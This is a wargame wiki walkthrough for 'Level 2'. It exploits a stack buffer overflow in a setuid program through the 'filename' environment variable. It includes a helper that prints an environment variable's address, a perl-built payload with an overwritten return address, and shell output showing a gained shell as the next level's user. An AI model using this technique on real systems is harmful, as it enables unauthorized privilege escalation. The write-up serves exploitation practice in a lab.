MRL WikiMain Page | About | Help | FAQ | Special pages | Log in

Printable version | Disclaimers | Privacy policy

Level 2

From MRL Wiki - level 2

Spoilers Below

Source code is provided for getowner.c. Line 20 contains an unbounded strcpy from user-supplied input to a 128-byte buffer buf.

20: strcpy(&buf[strlen(buf)], filename);

This is a straightforward classic stack overflow. Please note that the system this is running on has no stack randomization, non-executable stack, or other protective measures.

The string is supplied by setting the environment variable filename. Before user input is copied, "/tmp/" is placed at the beginning of the buffer. Even though it looks like only 127 bytes should trigger the overflow (123 to finish filling buf and 4 to overwrite filename pointer), there is some additional data on the stack that needs to be overwritten as well, so it actually takes 151 bytes.



#include <stdio.h>
#include <stdlib.h>

int main(void) {
        printf("$BISH at %p\n", getenv("BISH"));
level2@blackbox:/tmp/tyler2$ ./getenv
$BISH at 0xbfffdd8a
level2@blackbox:/tmp/tyler2$ export filename=`perl -e'print "A"x151 . "\x8a\xdd\xff\xbf"'`
level2@blackbox:/tmp/tyler2$ ~/getowner
The owner of this file is: 0
sh-3.1$ id
uid=1003(level2) gid=1005(gamers) euid=1004(level3) groups=1003(level2),1005(gamers)

Retrieved from ""

This page has been accessed 2,372 times. This page was last modified on 5 September 2008, at 14:56.


Main Page
Community portal
Current events
Recent changes
Random page
Edit this page
Editing help
This page
Discuss this page
New section
Printable version
Page history
What links here
Related changes
My pages
Log in / create account
Special pages
New pages
File list